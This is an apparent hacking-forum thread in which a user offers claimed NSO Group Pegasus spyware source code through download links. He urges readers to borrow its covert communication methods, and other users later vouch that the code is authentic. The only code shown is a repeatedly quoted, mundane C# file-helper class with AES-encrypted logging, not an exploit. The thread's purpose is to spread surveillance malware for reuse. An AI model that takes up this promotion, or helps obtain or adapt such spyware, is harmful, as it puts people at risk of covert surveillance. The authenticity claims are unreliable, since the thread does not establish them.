Posts: 240
Threads: 65
Joined: Aug 2024
Dec 31, 2024, 01:31 PM
(This post was last modified: Mar 25, 2025, 03:14 AM by viceCoolMan.)
The NSO Group is an Israeli company that makes advanced cyber tools.
Today I bring you the source code for their Zero Click spyware.
This was posted on BF in November but was taken down. Government entities have paid for this so here it is for free.
Check out the custom protocols and how they handle the network traffic. I recommend you take inspiration from these communication methods as they are quite cool.
PM me if the link stops working, information should be free.
Proof:
Quote:using System;
using System.IO;
using System.Linq;
using System.Text;
using PEGASUS.Cryptografhsh;
namespace PEGASUS.Tools.Helper
{
public static class FileHelper
{
private const string CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
private static readonly Random _rnd = new Random(Environment.TickCount);
private static readonly string[] _sizes = new string[4] { "B", "KB", "MB", "GB" };
private static readonly char[] _illegalChars = Path.GetInvalidPathChars().Union(Path.GetInvalidFileNameChars()).ToArray();
public static bool CheckPathForIllegalChars(string path)
{
return path.Any((char c) => _illegalChars.Contains©);
}
public static string GetRandomFilename(int length, string extension = "")
{
StringBuilder stringBuilder = new StringBuilder(length);
for (int i = 0; i < length; i++)
{
stringBuilder.Append("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[_rnd.Next("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".Length)]);
}
return stringBuilder.ToString() + extension;
}
public static int GetNewTransferId(int o = 0)
{
return _rnd.Next(0, int.MaxValue) + o;
}
public static string GetDataSize(long size)
{
double num = size;
int num2 = 0;
while (num >= 1024.0 && num2 + 1 < _sizes.Length)
{
num2++;
num /= 1024.0;
}
return $"{num:0.##} {_sizes[num2]}";
}
public static int GetFileIcon(string extension)
{
if (string.IsNullOrEmpty(extension))
{
return 2;
}
switch (extension.ToLower())
{
default:
return 2;
case ".exe":
return 3;
case ".txt":
case ".log":
case ".conf":
case ".cfg":
case ".asc":
return 4;
case ".rar":
case ".zip":
case ".zipx":
case ".tar":
case ".tgz":
case ".gz":
case ".s7z":
case ".7z":
case ".bz2":
case ".cab":
case ".zz":
case ".apk":
return 5;
case ".doc":
case ".docx":
case ".odt":
return 6;
case ".pdf":
return 7;
case ".jpg":
case ".jpeg":
case ".png":
case ".bmp":
case ".gif":
case ".ico":
return 8;
case ".mp4":
case ".mov":
case ".avi":
case ".wmv":
case ".mkv":
case ".m4v":
case ".flv":
return 9;
case ".mp3":
case ".wav":
case ".pls":
case ".m3u":
case ".m4a":
return 10;
}
}
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using FileStream fileStream = File.Open(filename, FileMode.Create, FileAccess.Write);
byte[] array = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array, 0, array.Length);
}
public static string ReadLogFile(string filename)
{
if (!File.Exists(filename))
{
return string.Empty;
}
return Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename)));
}
}
}
This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Self-Ban | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you wish to be unbanned in the future.
Posts: 40
Threads: 0
Joined: Oct 2023
Posts: 83
Threads: 7
Joined: Oct 2023
proof that it is the original one ?? link also not working
Posts: 240
Threads: 65
Joined: Aug 2024
Dec 31, 2024, 01:49 PM
(This post was last modified: Dec 31, 2024, 02:07 PM by viceCoolMan.)
(Dec 31, 2024, 01:43 PM)FlashLethal Wrote: proof that it is the original one ?? link also not working I just added an new mirror, I'll PM the link
Unfortunately, I don't have proof of the original post, I saw the thread and downloaded the file, then forgot about it. Recently, I asked someone if they saw the post and noticed it was deleted. I reposted what I originally downloaded. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Self-Ban | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you wish to be unbanned in the future.
Posts: 38
Threads: 2
Joined: Jun 2023
why ask for 8 credits(Hidden Content), source is incomplete. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 240
Threads: 65
Joined: Aug 2024
Dec 31, 2024, 02:52 PM
(This post was last modified: Dec 31, 2024, 02:53 PM by viceCoolMan.)
(Dec 31, 2024, 02:49 PM)Sec13B Wrote: why ask for 8 credits(Hidden Content), source is incomplete.
How is it incomplete? Genuinely curious. This is a repost. 8 credits so bots can't scrape it. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Self-Ban | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you wish to be unbanned in the future.
Posts: 38
Threads: 2
Joined: Jun 2023
all good , my mistake
" <HintPath>D:\IDM\msrdc\SourceDir\Remote Desktop\Newtonsoft.Json.dll</HintPath>"
all dll are in the zip file This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 54
Threads: 6
Joined: Aug 2023
Jan 01, 2025, 10:47 AM
(This post was last modified: Jan 01, 2025, 10:48 AM by Szczebrzeszyn.)
(Dec 31, 2024, 01:31 PM)viceCoolMan Wrote: The NSO Group is an Israeli company that makes advanced cyber tools.
Today I bring you the source code for their Zero Click spyware.
This was posted on BF in November but was taken down. Government entities have paid for this so here it is for free.
Check out the custom protocols and how they handle the network traffic. I recommend you take inspiration from these communication methods as they are quite cool.
PM me if the link stops working, information should be free.
Proof:
Quote:using System;
using System.IO;
using System.Linq;
using System.Text;
using PEGASUS.Cryptografhsh;
namespace PEGASUS.Tools.Helper
{
public static class FileHelper
{
private const string CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
private static readonly Random _rnd = new Random(Environment.TickCount);
private static readonly string[] _sizes = new string[4] { "B", "KB", "MB", "GB" };
private static readonly char[] _illegalChars = Path.GetInvalidPathChars().Union(Path.GetInvalidFileNameChars()).ToArray();
public static bool CheckPathForIllegalChars(string path)
{
return path.Any((char c) => _illegalChars.Contains©);
}
public static string GetRandomFilename(int length, string extension = "")
{
StringBuilder stringBuilder = new StringBuilder(length);
for (int i = 0; i < length; i++)
{
stringBuilder.Append("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[_rnd.Next("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".Length)]);
}
return stringBuilder.ToString() + extension;
}
public static int GetNewTransferId(int o = 0)
{
return _rnd.Next(0, int.MaxValue) + o;
}
public static string GetDataSize(long size)
{
double num = size;
int num2 = 0;
while (num >= 1024.0 && num2 + 1 < _sizes.Length)
{
num2++;
num /= 1024.0;
}
return $"{num:0.##} {_sizes[num2]}";
}
public static int GetFileIcon(string extension)
{
if (string.IsNullOrEmpty(extension))
{
return 2;
}
switch (extension.ToLower())
{
default:
return 2;
case ".exe":
return 3;
case ".txt":
case ".log":
case ".conf":
case ".cfg":
case ".asc":
return 4;
case ".rar":
case ".zip":
case ".zipx":
case ".tar":
case ".tgz":
case ".gz":
case ".s7z":
case ".7z":
case ".bz2":
case ".cab":
case ".zz":
case ".apk":
return 5;
case ".doc":
case ".docx":
case ".odt":
return 6;
case ".pdf":
return 7;
case ".jpg":
case ".jpeg":
case ".png":
case ".bmp":
case ".gif":
case ".ico":
return 8;
case ".mp4":
case ".mov":
case ".avi":
case ".wmv":
case ".mkv":
case ".m4v":
case ".flv":
return 9;
case ".mp3":
case ".wav":
case ".pls":
case ".m3u":
case ".m4a":
return 10;
}
}
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using FileStream fileStream = File.Open(filename, FileMode.Create, FileAccess.Write);
byte[] array = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array, 0, array.Length);
}
public static string ReadLogFile(string filename)
{
if (!File.Exists(filename))
{
return string.Empty;
}
return Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename)));
}
}
}
I wonder what can be done with this.
(Dec 31, 2024, 01:31 PM)viceCoolMan Wrote: The NSO Group is an Israeli company that makes advanced cyber tools.
Today I bring you the source code for their Zero Click spyware.
This was posted on BF in November but was taken down. Government entities have paid for this so here it is for free.
Check out the custom protocols and how they handle the network traffic. I recommend you take inspiration from these communication methods as they are quite cool.
PM me if the link stops working, information should be free.
Proof:
Quote:using System;
using System.IO;
using System.Linq;
using System.Text;
using PEGASUS.Cryptografhsh;
namespace PEGASUS.Tools.Helper
{
public static class FileHelper
{
private const string CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
private static readonly Random _rnd = new Random(Environment.TickCount);
private static readonly string[] _sizes = new string[4] { "B", "KB", "MB", "GB" };
private static readonly char[] _illegalChars = Path.GetInvalidPathChars().Union(Path.GetInvalidFileNameChars()).ToArray();
public static bool CheckPathForIllegalChars(string path)
{
return path.Any((char c) => _illegalChars.Contains©);
}
public static string GetRandomFilename(int length, string extension = "")
{
StringBuilder stringBuilder = new StringBuilder(length);
for (int i = 0; i < length; i++)
{
stringBuilder.Append("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[_rnd.Next("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".Length)]);
}
return stringBuilder.ToString() + extension;
}
public static int GetNewTransferId(int o = 0)
{
return _rnd.Next(0, int.MaxValue) + o;
}
public static string GetDataSize(long size)
{
double num = size;
int num2 = 0;
while (num >= 1024.0 && num2 + 1 < _sizes.Length)
{
num2++;
num /= 1024.0;
}
return $"{num:0.##} {_sizes[num2]}";
}
public static int GetFileIcon(string extension)
{
if (string.IsNullOrEmpty(extension))
{
return 2;
}
switch (extension.ToLower())
{
default:
return 2;
case ".exe":
return 3;
case ".txt":
case ".log":
case ".conf":
case ".cfg":
case ".asc":
return 4;
case ".rar":
case ".zip":
case ".zipx":
case ".tar":
case ".tgz":
case ".gz":
case ".s7z":
case ".7z":
case ".bz2":
case ".cab":
case ".zz":
case ".apk":
return 5;
case ".doc":
case ".docx":
case ".odt":
return 6;
case ".pdf":
return 7;
case ".jpg":
case ".jpeg":
case ".png":
case ".bmp":
case ".gif":
case ".ico":
return 8;
case ".mp4":
case ".mov":
case ".avi":
case ".wmv":
case ".mkv":
case ".m4v":
case ".flv":
return 9;
case ".mp3":
case ".wav":
case ".pls":
case ".m3u":
case ".m4a":
return 10;
}
}
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using FileStream fileStream = File.Open(filename, FileMode.Create, FileAccess.Write);
byte[] array = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array, 0, array.Length);
}
public static string ReadLogFile(string filename)
{
if (!File.Exists(filename))
{
return string.Empty;
}
return Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename)));
}
}
}
After it has finished downloading. I will check out the code and i will post my findings here, no matter how substantial or not. Great upload =)
Posts: 240
Threads: 65
Joined: Aug 2024
(Jan 01, 2025, 10:47 AM)Szczebrzeszyn Wrote: (Dec 31, 2024, 01:31 PM)viceCoolMan Wrote: The NSO Group is an Israeli company that makes advanced cyber tools.
Today I bring you the source code for their Zero Click spyware.
This was posted on BF in November but was taken down. Government entities have paid for this so here it is for free.
Check out the custom protocols and how they handle the network traffic. I recommend you take inspiration from these communication methods as they are quite cool.
PM me if the link stops working, information should be free.
Proof:
Quote:using System;
using System.IO;
using System.Linq;
using System.Text;
using PEGASUS.Cryptografhsh;
namespace PEGASUS.Tools.Helper
{
public static class FileHelper
{
private const string CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
private static readonly Random _rnd = new Random(Environment.TickCount);
private static readonly string[] _sizes = new string[4] { "B", "KB", "MB", "GB" };
private static readonly char[] _illegalChars = Path.GetInvalidPathChars().Union(Path.GetInvalidFileNameChars()).ToArray();
public static bool CheckPathForIllegalChars(string path)
{
return path.Any((char c) => _illegalChars.Contains©);
}
public static string GetRandomFilename(int length, string extension = "")
{
StringBuilder stringBuilder = new StringBuilder(length);
for (int i = 0; i < length; i++)
{
stringBuilder.Append("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[_rnd.Next("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".Length)]);
}
return stringBuilder.ToString() + extension;
}
public static int GetNewTransferId(int o = 0)
{
return _rnd.Next(0, int.MaxValue) + o;
}
public static string GetDataSize(long size)
{
double num = size;
int num2 = 0;
while (num >= 1024.0 && num2 + 1 < _sizes.Length)
{
num2++;
num /= 1024.0;
}
return $"{num:0.##} {_sizes[num2]}";
}
public static int GetFileIcon(string extension)
{
if (string.IsNullOrEmpty(extension))
{
return 2;
}
switch (extension.ToLower())
{
default:
return 2;
case ".exe":
return 3;
case ".txt":
case ".log":
case ".conf":
case ".cfg":
case ".asc":
return 4;
case ".rar":
case ".zip":
case ".zipx":
case ".tar":
case ".tgz":
case ".gz":
case ".s7z":
case ".7z":
case ".bz2":
case ".cab":
case ".zz":
case ".apk":
return 5;
case ".doc":
case ".docx":
case ".odt":
return 6;
case ".pdf":
return 7;
case ".jpg":
case ".jpeg":
case ".png":
case ".bmp":
case ".gif":
case ".ico":
return 8;
case ".mp4":
case ".mov":
case ".avi":
case ".wmv":
case ".mkv":
case ".m4v":
case ".flv":
return 9;
case ".mp3":
case ".wav":
case ".pls":
case ".m3u":
case ".m4a":
return 10;
}
}
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using FileStream fileStream = File.Open(filename, FileMode.Create, FileAccess.Write);
byte[] array = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array, 0, array.Length);
}
public static string ReadLogFile(string filename)
{
if (!File.Exists(filename))
{
return string.Empty;
}
return Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename)));
}
}
}
I wonder what can be done with this.
(Dec 31, 2024, 01:31 PM)viceCoolMan Wrote: The NSO Group is an Israeli company that makes advanced cyber tools.
Today I bring you the source code for their Zero Click spyware.
This was posted on BF in November but was taken down. Government entities have paid for this so here it is for free.
Check out the custom protocols and how they handle the network traffic. I recommend you take inspiration from these communication methods as they are quite cool.
PM me if the link stops working, information should be free.
Proof:
Quote:using System;
using System.IO;
using System.Linq;
using System.Text;
using PEGASUS.Cryptografhsh;
namespace PEGASUS.Tools.Helper
{
public static class FileHelper
{
private const string CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
private static readonly Random _rnd = new Random(Environment.TickCount);
private static readonly string[] _sizes = new string[4] { "B", "KB", "MB", "GB" };
private static readonly char[] _illegalChars = Path.GetInvalidPathChars().Union(Path.GetInvalidFileNameChars()).ToArray();
public static bool CheckPathForIllegalChars(string path)
{
return path.Any((char c) => _illegalChars.Contains©);
}
public static string GetRandomFilename(int length, string extension = "")
{
StringBuilder stringBuilder = new StringBuilder(length);
for (int i = 0; i < length; i++)
{
stringBuilder.Append("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[_rnd.Next("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".Length)]);
}
return stringBuilder.ToString() + extension;
}
public static int GetNewTransferId(int o = 0)
{
return _rnd.Next(0, int.MaxValue) + o;
}
public static string GetDataSize(long size)
{
double num = size;
int num2 = 0;
while (num >= 1024.0 && num2 + 1 < _sizes.Length)
{
num2++;
num /= 1024.0;
}
return $"{num:0.##} {_sizes[num2]}";
}
public static int GetFileIcon(string extension)
{
if (string.IsNullOrEmpty(extension))
{
return 2;
}
switch (extension.ToLower())
{
default:
return 2;
case ".exe":
return 3;
case ".txt":
case ".log":
case ".conf":
case ".cfg":
case ".asc":
return 4;
case ".rar":
case ".zip":
case ".zipx":
case ".tar":
case ".tgz":
case ".gz":
case ".s7z":
case ".7z":
case ".bz2":
case ".cab":
case ".zz":
case ".apk":
return 5;
case ".doc":
case ".docx":
case ".odt":
return 6;
case ".pdf":
return 7;
case ".jpg":
case ".jpeg":
case ".png":
case ".bmp":
case ".gif":
case ".ico":
return 8;
case ".mp4":
case ".mov":
case ".avi":
case ".wmv":
case ".mkv":
case ".m4v":
case ".flv":
return 9;
case ".mp3":
case ".wav":
case ".pls":
case ".m3u":
case ".m4a":
return 10;
}
}
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using FileStream fileStream = File.Open(filename, FileMode.Create, FileAccess.Write);
byte[] array = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array, 0, array.Length);
}
public static string ReadLogFile(string filename)
{
if (!File.Exists(filename))
{
return string.Empty;
}
return Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename)));
}
}
}
After it has finished downloading. I will check out the code and i will post my findings here, no matter how substantial or not. Great upload =) Thanks. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Self-Ban | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you wish to be unbanned in the future.
Posts: 54
Threads: 6
Joined: Aug 2023
Jan 01, 2025, 10:55 AM
(This post was last modified: Jan 01, 2025, 11:04 AM by Szczebrzeszyn.)
(Jan 01, 2025, 10:51 AM)viceCoolMan Wrote: (Jan 01, 2025, 10:47 AM)Szczebrzeszyn Wrote: (Dec 31, 2024, 01:31 PM)viceCoolMan Wrote: The NSO Group is an Israeli company that makes advanced cyber tools.
Today I bring you the source code for their Zero Click spyware.
This was posted on BF in November but was taken down. Government entities have paid for this so here it is for free.
Check out the custom protocols and how they handle the network traffic. I recommend you take inspiration from these communication methods as they are quite cool.
PM me if the link stops working, information should be free.
Proof:
Quote:using System;
using System.IO;
using System.Linq;
using System.Text;
using PEGASUS.Cryptografhsh;
namespace PEGASUS.Tools.Helper
{
public static class FileHelper
{
private const string CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
private static readonly Random _rnd = new Random(Environment.TickCount);
private static readonly string[] _sizes = new string[4] { "B", "KB", "MB", "GB" };
private static readonly char[] _illegalChars = Path.GetInvalidPathChars().Union(Path.GetInvalidFileNameChars()).ToArray();
public static bool CheckPathForIllegalChars(string path)
{
return path.Any((char c) => _illegalChars.Contains©);
}
public static string GetRandomFilename(int length, string extension = "")
{
StringBuilder stringBuilder = new StringBuilder(length);
for (int i = 0; i < length; i++)
{
stringBuilder.Append("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[_rnd.Next("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".Length)]);
}
return stringBuilder.ToString() + extension;
}
public static int GetNewTransferId(int o = 0)
{
return _rnd.Next(0, int.MaxValue) + o;
}
public static string GetDataSize(long size)
{
double num = size;
int num2 = 0;
while (num >= 1024.0 && num2 + 1 < _sizes.Length)
{
num2++;
num /= 1024.0;
}
return $"{num:0.##} {_sizes[num2]}";
}
public static int GetFileIcon(string extension)
{
if (string.IsNullOrEmpty(extension))
{
return 2;
}
switch (extension.ToLower())
{
default:
return 2;
case ".exe":
return 3;
case ".txt":
case ".log":
case ".conf":
case ".cfg":
case ".asc":
return 4;
case ".rar":
case ".zip":
case ".zipx":
case ".tar":
case ".tgz":
case ".gz":
case ".s7z":
case ".7z":
case ".bz2":
case ".cab":
case ".zz":
case ".apk":
return 5;
case ".doc":
case ".docx":
case ".odt":
return 6;
case ".pdf":
return 7;
case ".jpg":
case ".jpeg":
case ".png":
case ".bmp":
case ".gif":
case ".ico":
return 8;
case ".mp4":
case ".mov":
case ".avi":
case ".wmv":
case ".mkv":
case ".m4v":
case ".flv":
return 9;
case ".mp3":
case ".wav":
case ".pls":
case ".m3u":
case ".m4a":
return 10;
}
}
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using FileStream fileStream = File.Open(filename, FileMode.Create, FileAccess.Write);
byte[] array = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array, 0, array.Length);
}
public static string ReadLogFile(string filename)
{
if (!File.Exists(filename))
{
return string.Empty;
}
return Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename)));
}
}
}
I wonder what can be done with this.
(Dec 31, 2024, 01:31 PM)viceCoolMan Wrote: The NSO Group is an Israeli company that makes advanced cyber tools.
Today I bring you the source code for their Zero Click spyware.
This was posted on BF in November but was taken down. Government entities have paid for this so here it is for free.
Check out the custom protocols and how they handle the network traffic. I recommend you take inspiration from these communication methods as they are quite cool.
PM me if the link stops working, information should be free.
Proof:
Quote:using System;
using System.IO;
using System.Linq;
using System.Text;
using PEGASUS.Cryptografhsh;
namespace PEGASUS.Tools.Helper
{
public static class FileHelper
{
private const string CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
private static readonly Random _rnd = new Random(Environment.TickCount);
private static readonly string[] _sizes = new string[4] { "B", "KB", "MB", "GB" };
private static readonly char[] _illegalChars = Path.GetInvalidPathChars().Union(Path.GetInvalidFileNameChars()).ToArray();
public static bool CheckPathForIllegalChars(string path)
{
return path.Any((char c) => _illegalChars.Contains©);
}
public static string GetRandomFilename(int length, string extension = "")
{
StringBuilder stringBuilder = new StringBuilder(length);
for (int i = 0; i < length; i++)
{
stringBuilder.Append("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[_rnd.Next("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".Length)]);
}
return stringBuilder.ToString() + extension;
}
public static int GetNewTransferId(int o = 0)
{
return _rnd.Next(0, int.MaxValue) + o;
}
public static string GetDataSize(long size)
{
double num = size;
int num2 = 0;
while (num >= 1024.0 && num2 + 1 < _sizes.Length)
{
num2++;
num /= 1024.0;
}
return $"{num:0.##} {_sizes[num2]}";
}
public static int GetFileIcon(string extension)
{
if (string.IsNullOrEmpty(extension))
{
return 2;
}
switch (extension.ToLower())
{
default:
return 2;
case ".exe":
return 3;
case ".txt":
case ".log":
case ".conf":
case ".cfg":
case ".asc":
return 4;
case ".rar":
case ".zip":
case ".zipx":
case ".tar":
case ".tgz":
case ".gz":
case ".s7z":
case ".7z":
case ".bz2":
case ".cab":
case ".zz":
case ".apk":
return 5;
case ".doc":
case ".docx":
case ".odt":
return 6;
case ".pdf":
return 7;
case ".jpg":
case ".jpeg":
case ".png":
case ".bmp":
case ".gif":
case ".ico":
return 8;
case ".mp4":
case ".mov":
case ".avi":
case ".wmv":
case ".mkv":
case ".m4v":
case ".flv":
return 9;
case ".mp3":
case ".wav":
case ".pls":
case ".m3u":
case ".m4a":
return 10;
}
}
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using FileStream fileStream = File.Open(filename, FileMode.Create, FileAccess.Write);
byte[] array = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array, 0, array.Length);
}
public static string ReadLogFile(string filename)
{
if (!File.Exists(filename))
{
return string.Empty;
}
return Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename)));
}
}
}
After it has finished downloading. I will check out the code and i will post my findings here, no matter how substantial or not. Great upload =) Thanks.
Just to update. Its 100% original.
OP did a great job of having the foresight to download this and re-upload it. Great job OP =)
(Dec 31, 2024, 01:31 PM)viceCoolMan Wrote: The NSO Group is an Israeli company that makes advanced cyber tools.
Today I bring you the source code for their Zero Click spyware.
This was posted on BF in November but was taken down. Government entities have paid for this so here it is for free.
Check out the custom protocols and how they handle the network traffic. I recommend you take inspiration from these communication methods as they are quite cool.
PM me if the link stops working, information should be free.
Proof:
Quote:using System;
using System.IO;
using System.Linq;
using System.Text;
using PEGASUS.Cryptografhsh;
namespace PEGASUS.Tools.Helper
{
public static class FileHelper
{
private const string CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
private static readonly Random _rnd = new Random(Environment.TickCount);
private static readonly string[] _sizes = new string[4] { "B", "KB", "MB", "GB" };
private static readonly char[] _illegalChars = Path.GetInvalidPathChars().Union(Path.GetInvalidFileNameChars()).ToArray();
public static bool CheckPathForIllegalChars(string path)
{
return path.Any((char c) => _illegalChars.Contains©);
}
public static string GetRandomFilename(int length, string extension = "")
{
StringBuilder stringBuilder = new StringBuilder(length);
for (int i = 0; i < length; i++)
{
stringBuilder.Append("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[_rnd.Next("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".Length)]);
}
return stringBuilder.ToString() + extension;
}
public static int GetNewTransferId(int o = 0)
{
return _rnd.Next(0, int.MaxValue) + o;
}
public static string GetDataSize(long size)
{
double num = size;
int num2 = 0;
while (num >= 1024.0 && num2 + 1 < _sizes.Length)
{
num2++;
num /= 1024.0;
}
return $"{num:0.##} {_sizes[num2]}";
}
public static int GetFileIcon(string extension)
{
if (string.IsNullOrEmpty(extension))
{
return 2;
}
switch (extension.ToLower())
{
default:
return 2;
case ".exe":
return 3;
case ".txt":
case ".log":
case ".conf":
case ".cfg":
case ".asc":
return 4;
case ".rar":
case ".zip":
case ".zipx":
case ".tar":
case ".tgz":
case ".gz":
case ".s7z":
case ".7z":
case ".bz2":
case ".cab":
case ".zz":
case ".apk":
return 5;
case ".doc":
case ".docx":
case ".odt":
return 6;
case ".pdf":
return 7;
case ".jpg":
case ".jpeg":
case ".png":
case ".bmp":
case ".gif":
case ".ico":
return 8;
case ".mp4":
case ".mov":
case ".avi":
case ".wmv":
case ".mkv":
case ".m4v":
case ".flv":
return 9;
case ".mp3":
case ".wav":
case ".pls":
case ".m3u":
case ".m4a":
return 10;
}
}
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using FileStream fileStream = File.Open(filename, FileMode.Create, FileAccess.Write);
byte[] array = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array, 0, array.Length);
}
public static string ReadLogFile(string filename)
{
if (!File.Exists(filename))
{
return string.Empty;
}
return Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename)));
}
}
}
OP. Your first link has been blocked by Mega.
Your second link Mega (dot) nz is working.
|
